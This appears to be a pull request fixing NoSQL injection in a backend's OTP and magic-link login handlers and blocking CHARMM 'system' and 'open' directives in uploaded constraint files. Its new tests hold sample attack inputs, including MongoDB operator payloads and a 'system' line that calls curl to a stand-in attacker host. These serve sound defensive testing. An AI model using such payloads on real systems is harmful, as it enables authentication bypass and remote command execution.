### PR TITLE
Fix critical security: NoSQL injection and CHARMM system directive RCE

### DIFF
--- a/.changeset/security-nosql-injection-charmm-rce.md
+++ b/.changeset/security-nosql-injection-charmm-rce.md
@@ -1,0 +1,7 @@
+---
+'@bilbomd/backend': patch
+---
+
+Fix critical security vulnerabilities: NoSQL injection in OTP auth flow and CHARMM system directive RCE.
+
+Cast `email` and `otp` inputs to string before Mongoose queries to prevent MongoDB operator injection. Enable `mongoose.set('sanitizeFilter', true)` globally as defence-in-depth. Add keyword allowlist to `isValidConstInpFile` to reject CHARMM directives (`system`, `open`, etc.) that could execute arbitrary OS commands when the constraint file is STREAMed by the worker.

--- a/apps/backend/src/app.ts
+++ b/apps/backend/src/app.ts
@@ -50,6 +50,9 @@ logger.info(`Starting in ${environment} mode`)
 // Trust exactly 2 proxies: Cloudflare and Docker host
 app.set('trust proxy', 2)
 
+// Prevent MongoDB operator injection in all Mongoose queries
+mongoose.set('sanitizeFilter', true)
+
 // Connect to MongoDB
 connectDB()
 

--- a/apps/backend/src/controllers/__tests__/magickLinkController.test.ts
+++ b/apps/backend/src/controllers/__tests__/magickLinkController.test.ts
@@ -1,0 +1,84 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest'
+import type { Request, Response } from 'express'
+
+vi.mock('../../config/config.js', () => ({
+  config: { logLevel: 'info', sendEmailNotifications: false },
+  getEnvVar: vi.fn().mockReturnValue('https://bilbomd.example.com')
+}))
+
+vi.mock('@bilbomd/mongodb-schema', () => ({
+  User: { findOne: vi.fn() }
+}))
+
+vi.mock('../../config/nodemailerConfig.js', () => ({
+  sendMagickLinkEmail: vi.fn()
+}))
+
+vi.mock('crypto', () => ({
+  default: {
+    randomBytes: vi.fn().mockReturnValue({
+      toString: () => 'deadbeef00112233445566778899aabb'
+    })
+  }
+}))
+
+import { User } from '@bilbomd/mongodb-schema'
+import { generateMagickLink } from '../magickLinkController.js'
+
+const makeReq = (body: unknown): Request => ({ body } as Request)
+const makeRes = (): Response => {
+  const res = {} as Response
+  res.status = vi.fn().mockReturnValue(res)
+  res.json = vi.fn().mockReturnValue(res)
+  return res
+}
+
+const execReturning = (value: unknown) =>
+  ({ exec: vi.fn().mockResolvedValue(value) }) as never
+
+beforeEach(() => vi.clearAllMocks())
+
+describe('generateMagickLink — NoSQL injection prevention', () => {
+  it('casts an object email to string, querying with a literal string', async () => {
+    const req = makeReq({ email: { $ne: '' } })
+    const res = makeRes()
+
+    vi.mocked(User.findOne).mockReturnValue(execReturning(null))
+
+    await generateMagickLink(req, res)
+
+    // The injected object becomes '[object Object]' — findOne receives a plain
+    // string, never a MongoDB operator object
+    expect(User.findOne).toHaveBeenCalledWith({ email: '[object Object]' })
+    expect(res.status).toHaveBeenCalledWith(401)
+  })
+
+  it('returns 400 when email is missing', async () => {
+    const req = makeReq({})
+    const res = makeRes()
+
+    await generateMagickLink(req, res)
+
+    expect(User.findOne).not.toHaveBeenCalled()
+    expect(res.status).toHaveBeenCalledWith(400)
+  })
+
+  it('returns 201 for a valid, active user with a plain string email', async () => {
+    const mockUser = {
+      email: 'scott@example.com',
+      status: 'Active',
+      active: true,
+      otp: null,
+      save: vi.fn()
+    }
+    vi.mocked(User.findOne).mockReturnValue(execReturning(mockUser))
+
+    const req = makeReq({ email: 'scott@example.com' })
+    const res = makeRes()
+
+    await generateMagickLink(req, res)
+
+    expect(User.findOne).toHaveBeenCalledWith({ email: 'scott@example.com' })
+    expect(res.status).toHaveBeenCalledWith(201)
+  })
+})

--- a/apps/backend/src/controllers/auth/__tests__/authController.test.ts
+++ b/apps/backend/src/controllers/auth/__tests__/authController.test.ts
@@ -1,0 +1,93 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest'
+import type { Request, Response } from 'express'
+
+vi.mock('../../../config/config.js', () => ({
+  config: { logLevel: 'info', sendEmailNotifications: false },
+  getEnvVar: vi.fn().mockReturnValue('test-secret')
+}))
+
+vi.mock('@bilbomd/mongodb-schema', () => ({
+  User: { findOne: vi.fn() }
+}))
+
+vi.mock('../authTokens.js', () => ({
+  issueTokensAndSetCookie: vi.fn()
+}))
+
+vi.mock('jsonwebtoken', () => ({
+  default: { verify: vi.fn() }
+}))
+
+import { User } from '@bilbomd/mongodb-schema'
+import { issueTokensAndSetCookie } from '../authTokens.js'
+import { otp } from '../authController.js'
+
+const makeReq = (body: unknown): Request => ({ body } as Request)
+const makeRes = (): Response => {
+  const res = {} as Response
+  res.status = vi.fn().mockReturnValue(res)
+  res.json = vi.fn().mockReturnValue(res)
+  return res
+}
+
+beforeEach(() => vi.clearAllMocks())
+
+describe('otp handler — NoSQL injection prevention', () => {
+  it('casts an object payload to string, querying with a literal string', async () => {
+    const req = makeReq({ otp: { $gt: '' } })
+    const res = makeRes()
+
+    vi.mocked(User.findOne).mockResolvedValue(null)
+
+    await otp(req, res)
+
+    // The injected object is cast to '[object Object]' — findOne receives a plain
+    // string, never a MongoDB operator object
+    expect(User.findOne).toHaveBeenCalledWith({ 'otp.code': '[object Object]' })
+    expect(res.status).toHaveBeenCalledWith(401)
+  })
+
+  it('casts an array payload to its comma-joined string', async () => {
+    const req = makeReq({ otp: ['a', 'b'] })
+    const res = makeRes()
+
+    vi.mocked(User.findOne).mockResolvedValue(null)
+
+    await otp(req, res)
+
+    expect(User.findOne).toHaveBeenCalledWith({ 'otp.code': 'a,b' })
+    expect(res.status).toHaveBeenCalledWith(401)
+  })
+
+  it('returns 400 when otp field is absent', async () => {
+    const req = makeReq({})
+    const res = makeRes()
+
+    await otp(req, res)
+
+    expect(User.findOne).not.toHaveBeenCalled()
+    expect(res.status).toHaveBeenCalledWith(400)
+  })
+
+  it('issues tokens for a valid string OTP', async () => {
+    const mockUser = {
+      active: true,
+      username: 'scott',
+      email: 'scott@example.com',
+      otp: { expiresAt: new Date(Date.now() + 60000) },
+      save: vi.fn()
+    }
+    vi.mocked(User.findOne).mockResolvedValue(mockUser as never)
+    vi.mocked(issueTokensAndSetCookie).mockResolvedValue('access-token')
+
+    const req = makeReq({ otp: 'abc123def456abc123def456abc123def4' })
+    const res = makeRes()
+
+    await otp(req, res)
+
+    expect(User.findOne).toHaveBeenCalledWith({
+      'otp.code': 'abc123def456abc123def456abc123def4'
+    })
+    expect(res.json).toHaveBeenCalledWith({ accessToken: 'access-token' })
+  })
+})

--- a/apps/backend/src/controllers/auth/authController.ts
+++ b/apps/backend/src/controllers/auth/authController.ts
@@ -15,7 +15,7 @@ interface BilboMDJwtPayload {
 
 const otp = async (req: Request, res: Response) => {
   try {
-    const { otp: code } = req.body
+    const code = String(req.body.otp ?? '')
 
     if (!code) {
       res.status(400).json({ message: 'OTP required.' })

--- a/apps/backend/src/controllers/magickLinkController.ts
+++ b/apps/backend/src/controllers/magickLinkController.ts
@@ -8,7 +8,7 @@ import { sendMagickLinkEmail } from '../config/nodemailerConfig.js'
 const bilboMdUrl = getEnvVar('BILBOMD_URL')
 
 const generateMagickLink = async (req: Request, res: Response) => {
-  const { email } = req.body
+  const email = String(req.body.email ?? '')
 
   if (!email) {
     res.status(400).json({ message: 'email is required' })

--- a/apps/backend/src/validation/helpers/__tests__/validationFunctions.test.ts
+++ b/apps/backend/src/validation/helpers/__tests__/validationFunctions.test.ts
@@ -454,4 +454,62 @@ describe('isValidConstInpFile', () => {
     const result = await isValidConstInpFile(mockFile(), 'pdb')
     expect(result).toMatch(/last line must be "return"/)
   })
+
+  it('rejects a file containing a "system" directive', async () => {
+    const content = [
+      'define fixed1 sele ( resid 1:5 .and. segid PROA ) end',
+      'cons fix sele fixed1 end',
+      'system "curl https://attacker.example/?x=$(id)"',
+      'return'
+    ].join('\n')
+    mockReadFile(content)
+    const result = await isValidConstInpFile(mockFile(), 'pdb')
+    expect(result).toMatch(/Disallowed keyword/)
+  })
+
+  it('rejects a file containing an "open" directive', async () => {
+    const content = [
+      'define fixed1 sele ( resid 1:5 .and. segid PROA ) end',
+      'cons fix sele fixed1 end',
+      'open unit 10 write card name /tmp/evil',
+      'return'
+    ].join('\n')
+    mockReadFile(content)
+    const result = await isValidConstInpFile(mockFile(), 'pdb')
+    expect(result).toMatch(/Disallowed keyword/)
+  })
+
+  it('accepts comment lines starting with "!" alongside valid keywords', async () => {
+    const content = [
+      '! constraint file header',
+      'define fixed1 sele ( resid 1:5 .and. segid PROA ) end',
+      'cons fix sele fixed1 end',
+      '! end of constraints',
+      'return'
+    ].join('\n')
+    mockReadFile(content)
+    expect(await isValidConstInpFile(mockFile(), 'pdb')).toBe(true)
+  })
+
+  it('accepts comment lines starting with "*" alongside valid keywords', async () => {
+    const content = [
+      '* CHARMM constraint file',
+      'define fixed1 sele ( resid 1:5 .and. segid PROA ) end',
+      'cons fix sele fixed1 end',
+      'return'
+    ].join('\n')
+    mockReadFile(content)
+    expect(await isValidConstInpFile(mockFile(), 'pdb')).toBe(true)
+  })
+
+  it('accepts "cons harm" lines for harmonic constraints', async () => {
+    const content = [
+      'define fixed1 sele ( resid 1:5 .and. segid PROA ) end',
+      'cons fix sele fixed1 end',
+      'cons harm force 10.0 sele fixed1 end',
+      'return'
+    ].join('\n')
+    mockReadFile(content)
+    expect(await isValidConstInpFile(mockFile(), 'pdb')).toBe(true)
+  })
 })

--- a/apps/backend/src/validation/helpers/validationFunctions.ts
+++ b/apps/backend/src/validation/helpers/validationFunctions.ts
@@ -306,6 +306,25 @@ const isValidConstInpFile = async (
       }
     }
 
+    // Allowlist check: reject any line that doesn't start with a permitted keyword.
+    // This blocks CHARMM directives like 'system', 'open', 'read', etc. that could
+    // execute arbitrary OS commands or perform file I/O when the file is STREAMed.
+    const ALLOWED_PREFIXES = [
+      'define',
+      'cons fix',
+      'cons harm',
+      'shape desc',
+      'return',
+      '!',
+      '*'
+    ]
+    for (const line of lines) {
+      const lower = line.trim().toLowerCase()
+      if (!ALLOWED_PREFIXES.some((pfx) => lower.startsWith(pfx))) {
+        return `Disallowed keyword in constraint file: "${line.trim()}"`
+      }
+    }
+
     return true // All checks passed
   } catch {
     return 'Error reading file'


### PR DESCRIPTION
## Summary

- **NoSQL injection**: Cast `email` and `otp` inputs to `String()` before Mongoose queries in `magickLinkController` and `authController`, preventing MongoDB operator injection (e.g. `{$ne: ''}` in request body)
- **Global sanitization**: Enable `mongoose.set('sanitizeFilter', true)` in `app.ts` as defence-in-depth for all queries across the backend
- **CHARMM RCE**: Add keyword allowlist to `isValidConstInpFile` rejecting CHARMM directives (`system`, `open`, `read`, etc.) that could execute arbitrary OS commands when the constraint `.inp` file is STREAMed by the worker

## Test plan

- [ ] `pnpm -F @bilbomd/backend test` — all existing and new tests pass
- [ ] New tests in `magickLinkController.test.ts` verify that object/operator payloads are cast to strings and queries always receive a plain string
- [ ] New tests in `authController.test.ts` verify the same for the OTP code field
- [ ] New tests in `validationFunctions.test.ts` verify that `system` and `open` directives are rejected, while valid constraint syntax (comments, `cons fix`, `cons harm`, `return`) is accepted

🤖 Generated with [Claude Code](https://claude.com/claude-code)